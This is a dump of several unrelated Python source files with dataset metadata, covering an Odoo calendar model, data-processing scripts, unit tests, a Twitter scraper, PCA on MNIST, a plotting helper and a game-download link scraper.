'monday'),\n (2, 'tuesday'),\n (3, 'wednesday'),\n (4, 'thursday'),\n (5, 'friday'),\n (6, 'saturday'),\n (7, 'sunday')], readonly=True)\n week = fields.Integer(readonly=True)\n month = fields.Selection([(1, 'january'),\n (2, 'february'),\n (3, 'march'),\n (4, 'april'),\n (5, 'may'),\n (6, 'june'),\n (7, 'july'),\n (8, 'august'),\n (9, 'september'),\n (10, 'october'),\n (11, 'november'),\n (12, 'december')])\n year = fields.Many2one(comodel_name='base.calendar', ondelete='cascade')\n holiday = fields.Boolean('Holiday?', default=False)\n\n\nclass BaseCalendar(models.Model):\n _inherit = 'base.calendar'\n\n days = fields.One2many(comodel_name='base.calendar.days',\n inverse_name='year')\n mrp_days = fields.One2many(comodel_name='mrp.calendar.days',\n inverse_name='year')\n\n @api.model\n def create(self, vals):\n res = super(models.Model, self).create(vals)\n\n def perdelta(start, end, delta):\n curr = start\n while curr < end:\n yield curr\n curr += delta\n\n days = []\n for d in perdelta(date(res.year, 1, 1),\n date(res.year + 1, 1, 1),\n timedelta(days=1)):\n days.append((0, 0, {\n 'day': d,\n 'weekday': d.isoweekday(),\n 'week': d.isocalendar()[1],\n 'month': d.month\n }))\n res.write({'days': days})\n\n mrp_days = []\n for d in res.days.ids:\n mrp_days.append((0, 0, {'base_day': d}))\n res.write({'mrp_days': mrp_days})\n\n return res","sub_path":"project-addons/custom_calendars/models/base_calendar.py","file_name":"base_calendar.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"37324279","text":"#--------------------------------------------------------------------\n#File: \tlog_util.py\n#Author: F.Kesel\n#Date: \t29.12.2015\n#Purpose:Functions for log-file handling \n#--------------------------------------------------------------------\n\n\n\n#Read data from log file \"fileName\"\n#x: x-axis, y: y-axis\ndef readLogFile(fileName, x, y ):\n\tthefile = open(fileName, \"r\")\n\twhile thefile:\n\t\tline = thefile.readline()\n\t\tif len(line) < 2:\n\t\t\tbreak\n\t\telements = line.split()\n\t\tx.append(elements[0])\n\t\ty.append(elements[1])\n\tthefile.close()\n\n\n","sub_path":"lib/log_util.py","file_name":"log_util.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"317645409","text":"#!/usr/bin/env python\nimport tldextract\nimport sys\nimport time\ndef main():\n with open('testdata.txt') as fp:\n for line in fp:\n line=line.strip('\\n')\n ext=tldextract.extract(line)\n time.sleep(.20)\n print('.'.join(ext[1:]))\nif __name__ == '__main__':\n main()\n","sub_path":"tld_extract.py","file_name":"tld_extract.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"259550225","text":"import pandas as pd\n\ndf = pd.read_csv(\"raw-data/output/Context_Output_full.csv\")\nprint(df.head())\n\n# Unnamed: 0 position left original mutation right WRT_ORI WRT_TERM full_original full_mutation\n#0 newrow 1807 G T C C 4168193 1861193 GTC GCC\n#1 newrow 1810 T G A T 4168190 1861190 TGT TAT\n#2 newrow 2854 T T C C 4167146 1860146 TTC TCC\n#3 newrow 3701 C A C A 4166299 1859299 CAA CCA\n#4 newrow 4731 G G A T 4165269 1858269 GGT GA\n#attach new cols to the dataframe\ndf['full_original'] = df.apply(lambda row: row.left + row.original + row.right, axis=1)\ndf['full_mutation'] = df.apply(lambda row: row.left + row.mutation + row.right, axis=1)\nprint(df.head())\n\nprint()\n\n\n#Looks Like\n#AAA 2\n#AAC 8\n#AAG 1\n#AAT 1\n#ACA 2\ncounts = df.groupby('full_mutation')['position'].nunique()\nprint (counts.head())\n\nfor row in df.groupby('full_mutation'):\n print(''',\n \n {\n \"name\": \"''' + str(row[0]) + '''\",\n \"series\": [\n {\n \"name\": \"2010\",\n \"value\": 5000002\n },\n {\n \"name\": \"2011\",\n \"value\": 5800000\n }\n ]\n }''')\n#Create CSV File\ncounts.to_csv('processed-data/bacillus-mutations.csv', sep=',', encoding='utf-8')\n\n#Create JSON File\n\nimport json\nd = counts.to_dict()\nd['species'] = \"bacillus\"\n\nwith open('processed-data/bacillus-mutations.json', 'w') as outfile:\n json.dump(d, outfile)","sub_path":"chromosome-csv-to-json.py","file_name":"chromosome-csv-to-json.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"565100151","text":"\"\"\"Test Pause Set Insteon ACK Message Two Bytes.\"\"\"\nimport unittest\nfrom binascii import unhexlify\n\nfrom pyinsteon.constants import MessageId\nfrom pyinsteon.protocol.messages.outbound import set_ack_message_two_bytes\nfrom tests import set_log_levels\nfrom tests.test_messages.test_outbound.outbound_base import OutboundBase\n\n\nclass PauseSetInsteonAckMessageTwoBytes(unittest.TestCase, OutboundBase):\n \"\"\"Test Pause Set Insteon ACK Message Two Bytes.\"\"\"\n\n def setUp(self):\n \"\"\"Test set up.\"\"\"\n self.hex = \"02710304\"\n self.cmd1 = int(0x03)\n self.cmd2 = int(0x04)\n\n kwargs = {\"cmd1\": self.cmd1, \"cmd2\": self.cmd2}\n\n super(PauseSetInsteonAckMessageTwoBytes, self).base_setup(\n MessageId.SET_ACK_MESSAGE_TWO_BYTES, unhexlify(self.hex), **kwargs\n )\n\n self.msg = set_ack_message_two_bytes(self.cmd1, self.cmd2)\n set_log_levels(\n logger=\"info\",\n logger_pyinsteon=\"info\",\n logger_messages=\"info\",\n logger_topics=False,\n )\n\n def test_cmd1(self):\n \"\"\"Test cmd1.\"\"\"\n assert self.msg.cmd1 == self.cmd1\n\n def test_cmd2(self):\n \"\"\"Test cmd2.\"\"\"\n assert self.msg.cmd2 == self.cmd2\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_messages/test_outbound/pause_set_insteon_ack_message_two_bytes.py","file_name":"pause_set_insteon_ack_message_two_bytes.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"269371550","text":"# -*- coding: UTF-8 -*-\n#花式索引\nimport scipy.misc\nimport matplotlib.pyplot as plt\n\nface = scipy.misc.face()\nxmax = face.shape[0]\nymax = face.shape[1]\nface = face[:min(xmax, ymax), :min(xmax, ymax)]\nacopy = face.copy()\nxmax = acopy.shape[0]\nymax = acopy.shape[1]\nacopy[range(xmax), range(ymax)] = 0\nacopy[range(xmax-1, -1, -1), range(ymax)] = 0\nplt.imshow(acopy)\nplt.show()\n","sub_path":"python/Learn/Course/PythonDataAnalysis/Chapter2/test2.8.py","file_name":"test2.8.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"140037907","text":"\"\"\"Configuration settings for train_dagger, training DAgger from synthetic demos.\"\"\"\n\nimport sacred\n\nfrom imitation.scripts.ingredients import bc\nfrom imitation.scripts.ingredients import demonstrations as demos_common\nfrom imitation.scripts.ingredients import environment, expert\nfrom imitation.scripts.ingredients import logging as logging_ingredient\nfrom imitation.scripts.ingredients import policy, policy_evaluation\n\ntrain_imitation_ex = sacred.Experiment(\n \"train_imitation\",\n ingredients=[\n logging_ingredient.logging_ingredient,\n demos_common.demonstrations_ingredient,\n policy.policy_ingredient,\n expert.expert_ingredient,\n environment.environment_ingredient,\n policy_evaluation.policy_evaluation_ingredient,\n bc.bc_ingredient,\n ],\n)\n\n\n@train_imitation_ex.config\ndef config():\n dagger = dict(\n use_offline_rollouts=False, # warm-start policy with BC from offline demos\n total_timesteps=1e5,\n beta_schedule=None,\n )\n\n\n@train_imitation_ex.named_config\ndef mountain_car():\n environment = dict(gym_id=\"MountainCar-v0\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_mountain_car():\n environment = dict(gym_id=\"seals/MountainCar-v0\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef cartpole():\n environment = dict(gym_id=\"CartPole-v1\")\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_cartpole():\n environment = dict(gym_id=\"seals/CartPole-v0\")\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef pendulum():\n environment = dict(gym_id=\"Pendulum-v1\")\n\n\n@train_imitation_ex.named_config\ndef ant():\n environment = dict(gym_id=\"Ant-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_ant():\n environment = dict(gym_id=\"seals/Ant-v0\")\n\n\n@train_imitation_ex.named_config\ndef half_cheetah():\n environment = dict(gym_id=\"HalfCheetah-v2\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef seals_half_cheetah():\n environment = dict(gym_id=\"seals/HalfCheetah-v0\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef humanoid():\n environment = dict(gym_id=\"Humanoid-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_humanoid():\n environment = dict(gym_id=\"seals/Humanoid-v0\")\n\n\n@train_imitation_ex.named_config\ndef fast():\n dagger = dict(total_timesteps=50)\n bc = dict(train_kwargs=dict(n_batches=50))\n","sub_path":"src/imitation/scripts/config/train_imitation.py","file_name":"train_imitation.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"273871973","text":"import matplotlib.pyplot as plt \r\nfrom matplotlib.lines import Line2D\r\nimport numpy as np\r\nimport param as P \r\n\r\n\r\nclass plotGenerator:\r\n ''' The purpose of this class is to organize multiple plots in one\r\n figure using subplots.The plots will be organized in n x m \r\n dimensions in the figure; where n represents the number of rows, \r\n and m represents the number of columns. Ex, a subplot with \r\n dimensions 3 x 2 will hold 6 plots. 3 plots per row, and 2 plots \r\n per column. \r\n\r\n Not every plot needs to be used. Ex, if you were to plot only \r\n 5 plots, you would still need dimensions 3 x 2 and one of the \r\n plots would never be populated.'''\r\n\r\n # You only need to modify the code inside '#'s as shown below.\r\n ##################################################################\r\n # CODE TO BE MODIFIED\r\n ##################################################################\r\n def __init__(self):\r\n #SECTION 1\r\n ##############################################################\r\n # Number of subplots = num_of_rows*num_of_cols\r\n self.num_of_rows = 2 # Number of subplot rows\r\n self.num_of_cols = 2 # Number of subplot columns\r\n ##############################################################\r\n\r\n # Crete figure and axes handles\r\n self.fig, self.ax = plt.subplots(self.num_of_rows, \r\n self.num_of_cols, sharex=True) \r\n\r\n # A list to hold the time history\r\n self.time_history = [] \r\n\r\n # The list type variable will store your plot objects\r\n self.handle = [] \r\n\r\n ''' Create the handles below.\r\n The class plotGenerator inherits the class myPlot, and \r\n organizes one or more instances of myPlot in a figure. The \r\n myPlot class organizes one or more line objects in a single \r\n axes. The syntax for myPlot is\r\n\r\n myPlot(axes,gain,xlabel,ylable,etc)\r\n\r\n To see a full description of myPlot, read the comments located \r\n in the class myPlot. However, note that all arguments have \r\n default values except the axes argument. \r\n (i.e., A myPlot object could easily be created by\r\n\r\n myPlot(self.ax[0])\r\n\r\n The class myPlot also supports pass-by-reference and \r\n pass-by-name. Examples are given below.\r\n\r\n self.handle.append(myPlot(self.ax[0],2,'xlabel','ylabel',\r\n 'title'))\r\n self.handle.append(myPlot(self.ax[1],180.0/np.pi,\r\n title=\"y_r/y\")\r\n self.handle.append(myPlot(self.ax[2],1,title=\"Force\",\r\n legend=(\"Force\",\"Torque\"))\r\n\r\n The myPlot class also comes with default line and color \r\n styles. You can either specify the line or color styles \r\n that you want when creating the myPlot object or you can \r\n modify the default values that are contained within the \r\n myPlot class.\r\n '''\r\n # Section 2\r\n ####################################################################\r\n self.handle.append(myPlot(self.ax[0,0],180.0/np.pi,'t(s)', 'deg', \r\n 'theta_r/theta'))\r\n self.handle.append(myPlot(self.ax[0,1],180.0/np.pi,'t(s)', 'deg', \r\n 'psi'))\r\n self.handle.append(myPlot(self.ax[1,0],180.0/np.pi,'t(s)', 'deg', \r\n 'phi_r/phi'))\r\n self.handle.append(myPlot(self.ax[1,1],P.km,'t(s)','Nm','force',legend=('fl','fr')))\r\n ####################################################################\r\n \r\n\r\n # Update the history\r\n def updateDataHistory(self,new_t, new_data):\r\n\r\n \"\"\"\r\n This function updates the data history of all the plots.\r\n - new_t: The current simulation time.\r\n - new_data: Is a list of data lists for each plot. The \r\n order of the data must be the same order in which\r\n the classes myPlot were created. \r\n\r\n Ex: There are two subplots. Instantiated as shown below\r\n\r\n self.handle.append(myPlot(self.ax[0],180.0/np.pi,\r\n 't(s)', 'deg','theta_r/theta'))\r\n\r\n self.handle.append(myPlot(self.ax[1],1,'t(s)',\r\n 'Nm','torque'))\r\n\r\n The first subplot plots theta_r and theta and the second subplot\r\n plots Torque. Since this is the order in which the myPlot \r\n classes were appended to the handle list, this is the order\r\n in which the data must be passed.\r\n\r\n Continuing the example:\r\n\r\n new_data = [[theta_r,theta],[torque]]\r\n\r\n Notice that new_data is a list of lists. The first inner list\r\n contains the data meant for the first plot, and the second \r\n inner list is meant for the second plot.\r\n \r\n \r\n \"\"\"\r\n \r\n # Add the new time data\r\n self.time_history.append(new_t)\r\n\r\n # Update all other data\r\n for i in range(len(self.handle)):\r\n self.handle[i].updateHistory(new_data[i])\r\n\r\n # Renders the data to the plots\r\n def update_plots(self):\r\n for i in range(len(self.handle)):\r\n self.handle[i].update_plot(self.time_history)\r\n\r\n\r\n\r\n\r\nclass myPlot:\r\n ''' This class organizes one or more line objects on one axes'''\r\n\r\n def __init__(self, ax, gain = 1,xlabel = 'x-axis', \r\n ylabel = 'y-axis',title = 'title', \r\n colors = ['b','r','g','c','m','y','b'], \r\n line_styles = ['-','--','-.',':'], \r\n legend = None, grid = True):\r\n\r\n ''' ax - This is a handle to the an axes of the figure\r\n gain - a scalar variable used on the data. This can be used \r\n to convert between units. Ex. to convert from \r\n radians to degrees, the gain should be 180/np.pi\r\n colors - Indicates the line color. If there are multiple lines,\r\n colors can be a list of different colors. Below is a \r\n list of options. Note that they are strings.\r\n\r\n 'b' - blue\r\n 'g' - green\r\n 'r' - red\r\n 'c' - cyan\r\n 'm' - magenta\r\n 'y' - yellow\r\n 'k' - black\r\n\r\n line_style - Indicates the line style. If there are multiple\r\n lines, line_style can be a list of different line \r\n styles. Below is a list of options. Note that they\r\n are strings.\r\n\r\n '-' - solid line\r\n '--' - dashed line\r\n '-.' - dash_dot\r\n ':' - dotted line\r\n\r\n legend - A tuple of strings that identify the data. \r\n EX: (\"data1\",\"data2\", ... , \"dataN\")\r\n\r\n xlable - Label of the x-axis\r\n ylable - Label of the y-axis\r\n title - Plot title\r\n gird - Indicates if a grid is to be overlapped on the plot\r\n '''\r\n\r\n\r\n self.legend = legend\r\n self.data_history = [] # Will contain the data history\r\n self.ax = ax # Axes handle\r\n self.gain = gain # The scales the data\r\n self.colors = colors # A list of colors. \r\n # The first color in the list\r\n # corresponds to the first line\r\n # object.\r\n self.line_styles=line_styles # A list of line styles.\r\n # The first line style in the list\r\n # corresponds to the first line \r\n # object.\r\n self.line = []\r\n\r\n # Configure the axes\r\n self.ax.set_ylabel(ylabel)\r\n self.ax.set_xlabel(xlabel)\r\n self.ax.set_title(title)\r\n self.ax.grid(grid)\r\n\r\n\r\n # Keeps track of initialization\r\n self.init = True \r\n\r\n\r\n # Adds the new data to the data history list after \r\n # scaling it by the gain.\r\n def updateHistory(self,new_data):\r\n # new_data: a list containing the new data.\r\n # Ex: new_data = [theta_r, theta]\r\n self.data_history.append([t*self.gain for t in new_data])\r\n\r\n def update_plot(self,time_history):\r\n\r\n # If it is being initialized\r\n if self.init == True:\r\n\r\n # size contains the number of line objects to create\r\n size = len(self.data_history[0])\r\n\r\n for i in range(size):\r\n # zip rearranges the list\r\n data = zip(*self.data_history)\r\n\r\n # Instantiate line object and add it to the axes\r\n self.line.append(Line2D(time_history,data[i], \r\n color = self.colors[np.mod(i,len(self.colors)-1)], \r\n ls = self.line_styles[np.mod(i,len(self.line_styles)-1)],\r\n label = self.legend[i] if self.legend != None else None))\r\n\r\n self.ax.add_line(self.line[i])\r\n\r\n self.init = False\r\n if self.legend != None:\r\n plt.legend(handles=self.line)\r\n else: # Add new data to the plot\r\n\r\n # zip rearranges the list\r\n data = zip(*self.data_history)\r\n\r\n # Updates the x and y data of each line.\r\n for i in range(len(self.line)):\r\n self.line[i].set_xdata(time_history)\r\n self.line[i].set_ydata(data[i])\r\n\r\n # Adjusts the axis to fit all of the data. \r\n self.ax.relim()\r\n self.ax.autoscale()\r\n \r\n\r\n","sub_path":"whirlybird_ws/src/whirlybird_controller/scripts/lab11/sim_plot.py","file_name":"sim_plot.py","file_ext":"py","file_size_in_byte":9980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"7816535","text":"# Calculate the sum of two integers a and b, but you are not allowed to use the operator + and -.\n\n# Example:\n# Given a = 1 and b = 2, return 3.\n\nclass Solution(object):\n def getSum(self, a, b):\n \"\"\"\n :type a: int\n :type b: int\n :rtype: int\n \"\"\"\n MAX_INT = 0X7FFFFFFF # since python int type has arbitrary width, we mimic a signed int type\n MIN_INT = 0X80000000\n MASK = 0X100000000 # detect overfloat\n\n while b:\n a, b = (a^b) % MASK, ((a&b) << 1) % MASK # a mark the part where no carry happened, b mark where the carries happened\n\n return a if a <= MAX_INT else ~((a % MIN_INT) ^ MAX_INT)\n # return a if a is still positive in signed integer representation, otherwise, we have to make it negative \"in python way\"\n\n # this solution can only work for unsigned integer sum\n def getSumPositive(self, a, b):\n \"\"\"\n :type a: int\n :type b: int\n :rtype: int\n \"\"\"\n ans = 0\n base = 1\n while a > 0 or b > 0:\n if a%2 & b%2 == 1:\n ans = ans | (base*2)\n elif a%2 | b%2 == 1:\n if ans / base == 0:\n ans = ans | base\n else:\n ans = (ans & (~base)) | (base*2)\n a = a >> 2\n b = b >> 2\n base = base << 1\n\n return ans\n\n","sub_path":"easy/371.py","file_name":"371.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"492985677","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 24\r\n\r\n@author: Mehmeta\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport GetOldTweets3 as got\r\n# Dokümantasyona buradan ulaşabilirsiniz: https://github.com/Mottl/GetOldTweets3\r\n\r\nimport time\r\n\r\ntweetCriteria = got.manager.TweetCriteria().setQuerySearch('aramak_istediginiz_ifade')\\\r\n .setSince(\"2020-05-12\")\\\r\n .setUntil(\"2020-05-13\")\\\r\n .setMaxTweets(10000)\\\r\n .setLang('tr')\r\n\r\n\"\"\" \r\n# setQuerySearch: Buraya aramak istediğiniz ifadeyi yazmalısınız\r\nÖrnek: setQuerySearch('python') içinde python ifadesi geçen;\r\n\t\ttweetleri, kullanıcı isimlerini, bio'kısmında python geçen tüm profilleri getirir.\r\n\t\tEmoji aratmak isterseniz, https://emojipedia.org/large-green-circle/ sitesinden aratabilirsiniz.\r\n\t\tSayfanın en altında \"Browse\" bölümünde twitter'a tıklarsanız, doğrudan twitter search açılır.\r\n\t\tAçılan linkteki \"https://twitter.com/search?q=\"\" ifadesinden hemen sonra çıkan ifayeyi bu alana yazabilirsiniz.\r\n\r\n# setSince: Aramaya hangi tarihten itibaren başlamak istediğinizi ifade eder. YYYY-MM-DD\r\n# setUntil: Aramanın hangi tarihte sona ermesini istediğinizi ifade eder. YYYY-MM-DD\r\n# setMaxTweets: -1 yazarsanız, aradığınız sorgu ile ilgili kaç tweet varsa, hepsini getirir.\r\n\t\t\t\tAma twitter buna engel olabiliyor. Ben kendi aramalarımda 10.000 civarı seçiyorum genellikle.\r\n\t\t\t\t\r\n# setMaxTweets: Aradığınız sorgunun hangi dilde olmasını isterseniz, bunu yazmalısınız.\r\n# Listeye şu linkten ulaşabilirsiniz: https://developer.twitter.com/en/docs/twitter-for-websites/twitter-for-websites-supported-languages/overview\r\n\"\"\"\r\n\r\nprint('Start...')\r\n# Yukarıda girdiğimiz kriterlere uyan tweetler \"tweets\" objesine alınır.\r\n# Bir hesabın, girdiğimiz kriterler içinde 1'den fazla tweeti varsa, listeye o kadar girer.\r\ntweets = got.manager.TweetManager.getTweets(tweetCriteria)\r\nprint('Collected!')\r\n\r\n# Tweets objesindeki elemanları bir listenin içine alıyoruz.\r\ntweets_list = [[twet.username, tweet.id, tweet.permalink, tweet.date, tweet.text, tweet.hashtags, tweet.geo] for tweet in tweets] \r\ntweets_list = np.reshape(tweets_list, (-1, 7))\r\n\r\n\r\ndf = pd.DataFrame({'username': tweets_list[:, 0], 'tweet_id': tweets_list[:, 1],\r\n 'permalink':tweets_list[:, 2], 'date':tweets_list[:, 3],\r\n 'text':tweets_list[:, 4], 'hashtags':tweets_list[:, 5],\r\n 'geo':tweets_list[:, 6]})\r\n\r\n# tweetin içindeki tüm hashtagler hashtags kolonu içinde yer alıyor.\r\n# Ancak sorun şu ki, hashtagte Türkçe karakter varsa, hashtag orada kesiliyor.\r\ndf['hashtags'] = df.text.str.findall(r'#.*?(?=\\s|$)') # Bu şekilde daha doğru şekilde alınabilir.\r\n\r\ndf.to_csv('tweet_data.csv',index=False)\r\n\r\nprint(df.head(10))\r\nprint(df.shape)\r\n# print(df.permalink.value_counts())\r\n\r\nprint('Sleep...')\r\ntime.sleep(60*15) # 15 dakika\r\n","sub_path":"1_tweet_collect.py","file_name":"1_tweet_collect.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"469636552","text":"num = int(input())\nleft = 1\nright = num - 1\nflag = False\nif num % 2 == 0:\n step = int(num /2)\nelse:\n step = int(num/2)\n #print(step)\nfor i in range(step):\n if left % 2 == 0 and right %2 == 0:\n flag = True \n break\n left += 1\n right -= 1\n #print(left,right)\n \nif flag:\n print(\"YES\")\nelse:\n print(\"NO\")","sub_path":"dev/methds/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"609964808","text":"def main(): \r\n try:\r\n from bs4 import BeautifulSoup\r\n import urllib.request\r\n import re\r\n except ImportError:\r\n print(\"Some modules are not installed. Run \\n python -m pip install -r requirements.txt\")\r\n exit()\r\n\r\n\r\n\r\n url_choice = input(\"IGG-Games Link: \")\r\n if not (url_choice.startswith(\"http://\") or url_choice.startswith(\"https://\")):\r\n url_choice = \"http://\" + url_choice\r\n req = urllib.request.Request(\r\n url_choice, \r\n data=None, \r\n headers={\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\r\n }\r\n )\r\n\r\n possible_sources = [\"MegaUp.net\", \"Rapidgator\", \"Mega.co.nz\", \"Openload.co\", \"KumpulBagi\", \"UpFile\", \"FileCDN\", \"Go4Up (Multi Links)\", \"Uploaded\", \"Uptobox\", \"Google Drive\"] #Download Sources\r\n existing_sources = []\r\n\r\n try:\r\n request = urllib.request.urlopen(req)\r\n except urllib.error.URLError:\r\n print(\"Url could not be opend.\")\r\n exit()\r\n\r\n soup = BeautifulSoup(request, \"lxml\")\r\n\r\n for paragraph in soup.find_all(\"p\"):\r\n for source in possible_sources:\r\n if \"Link \" + source in paragraph.text:\r\n existing_sources.append(source)\r\n\r\n if not existing_sources:\r\n print(\"No Link sources found.\")\r\n exit()\r\n for counter, value in enumerate(existing_sources):\r\n print(str(counter + 1) + \") \" + value) \r\n source_choice = input(\"Choose download source: \")\r\n while not isinstance(source_choice, int):\r\n try:\r\n source_choice = int(source_choice)\r\n if source_choice > len(existing_sources):\r\n raise ValueError\r\n except ValueError:\r\n source_choice = input(\"Please enter a number between 1 and \"+str(len(existing_sources))+ \": \")\r\n \r\n\r\n\r\n for paragraph in soup.find_all(\"p\"):\r\n if existing_sources[source_choice - 1] in paragraph.text:\r\n print(\"\\n\")\r\n for hyperlink in paragraph(\"a\"):\r\n string = hyperlink.get('href')\r\n string = re.sub('%23', '#', string)\r\n print(\"http\"+string[string.rfind(\"://\"):])\r\n print()\r\n break\r\n\r\nmain()\r\n","sub_path":"igg_scraper.py","file_name":"igg_scraper.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"43212555","text":"# -*- coding: utf-8 -*-\nfrom plone.app.testing import logout\nfrom Products.PloneKeywordManager.config import PROJECTNAME\nfrom Products.PloneKeywordManager.tests.base import BaseIntegrationTestCase\nfrom zope.component import getMultiAdapter\n\n\nclass ControlPanelTestCase(BaseIntegrationTestCase):\n\n def setUp(self):\n super(ControlPanelTestCase, self).setUp()\n self.controlpanel = self.portal['portal_controlpanel']\n\n def test_controlpanel_has_view(self):\n view = getMultiAdapter(\n (self.portal, self.request), name='prefs_keywords_view')\n view = view.__of__(self.portal)\n self.assertTrue(view())\n\n def test_controlpanel_view_is_protected(self):\n from AccessControl import Unauthorized\n logout()\n with self.assertRaises(Unauthorized):\n self.portal.restrictedTraverse('@@prefs_keywords_view')\n\n def test_controlpanel_installed(self):\n actions = [a.getAction(self)['id']\n for a in self.controlpanel.listActions()]\n self.assertIn('keywordmanager', actions)\n\n def test_controlpanel_removed_on_uninstall(self):\n qi = self.portal['portal_quickinstaller']\n qi.uninstallProducts(products=[PROJECTNAME])\n actions = [a.getAction(self)['id']\n for a in self.controlpanel.listActions()]\n self.assertNotIn('keywordmanager', actions)\n","sub_path":"Products/PloneKeywordManager/tests/test_controlpanel.py","file_name":"test_controlpanel.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"99681200","text":"import keras\nimport numpy as np\nfrom keras import datasets\nfrom numpy.linalg import eig\nimport matplotlib.pyplot as plt\nfrom numpy import cov\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom keras.datasets import mnist\nfrom sklearn.metrics import accuracy_score\n\n\n\ndef reduce_dimensions_pca(data):\n \"\"\"\n\n :param data: data to reduce dimension\n :return: data with reduced dimensions\n \"\"\"\n\n mean = np.mean(data, axis=0)\n centered = data - mean\n\n cov_mat = cov(centered.T)\n eig_val, eig_vec = eig(cov_mat)\n eig_pairs = [(np.abs(eig_val[i]), eig_vec[:, i]) for i in range(len(eig_val))]\n\n # Sort the (eigenvalue, eigenvector) tuples from high to low\n eig_pairs.sort(key=lambda x: x[0], reverse=True)\n\n # Checking the eig values\n eig_val_sorted = np.array([x[0] for x in eig_pairs])\n\n # Ordering the eig vectors into columns\n eig_vec_sorted = np.array([x[1] for x in eig_pairs]).T\n return mean, eig_val_sorted, eig_vec_sorted\n\nif __name__ == \"__main__\":\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train = x_train.reshape(60000, 28 * 28)\n x_test = x_test.reshape((10000, 28 * 28))\n x_train = x_train / 255\n x_test = x_test / 255\n\n # getting the mean, eig_val and eig_vecs\n mean, eig_val, eig_vec = reduce_dimensions_pca(x_train)\n dimensions = [40, 80, 200]\n clf = KNeighborsClassifier(n_neighbors=3)\n for dim in dimensions:\n x_train_new = x_train - mean\n reduced = x_train_new.dot(eig_vec[:, :dim])\n clf.fit(reduced, y_train)\n x_test_new = x_test - mean\n x_test_proj = x_test_new.dot(eig_vec[:, :dim])\n pred = clf.predict(x_test_proj)\n print('dimensions {0}, acc {1}'.format(dim, accuracy_score(y_test, pred)))\n","sub_path":"submission/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"296536326","text":"from xml.etree import ElementTree\n\nclass ResourcesUtil:\n\n @staticmethod\n def GetEntryValue(entry):\n tree = ElementTree.parse(\"Resources/MySql/Sentences.xml\")\n for i in range(len(tree.findall(\"entry\"))):\n item = tree.getroot()[i]\n if (item.items()[0][1] == entry):\n return item.text\n return None","sub_path":"Util/ResourcesUtil.py","file_name":"ResourcesUtil.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"607785393","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\ndef f(x):\n\tif x != 0:\n\t\treturn(np.exp(-x**2))\n\telse:\n\t\treturn(1)\n\t\t\n\nx_min= -50\nx_max= 50\nn= 256 #number of points taken\ndx= (x_max - x_min)/(n-1)\nx= np.zeros(n)\ny= np.zeros(n)\n\nfor i in range(n):\n\tx[i]= x_min + i*dx\n\ty[i]= f(x[i])\n\ny_ft_np= np.fft.fft(y,norm='ortho') # Fourier transform that numpy gives\n\nk_np= np.fft.fftfreq(n, d= dx) # k values that numpy returns\nk= 2*np.pi*k_np # true values of k\n\nph_factor= np.exp( -1j *k*x_min) #phase factor \ny_ft = dx * np.sqrt(n/(2.0*np.pi)) * ph_factor * y_ft_np # True Fourier transform \n\n\nplt.plot(x,y,'r')\nplt.scatter(x,y)\nplt.title('Plot of sinc function')\nplt.show()\t\n\nplt.plot(k,y_ft,'b')\nplt.scatter(k,y_ft)\nplt.title('Plot of Fourier 